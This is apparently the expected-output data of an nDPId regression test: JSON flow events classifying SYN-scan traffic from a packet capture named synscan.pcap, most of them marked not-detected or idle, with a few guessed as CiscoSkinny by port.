-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1984,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":682,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10180,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1319,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1423,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":57294,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1631,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":833,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058656,"flow_last_seen":1278275058656,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"CiscoSkinny","breed":"Acceptable","category":"VoIP"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1496,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060291,"flow_last_seen":1278275060291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 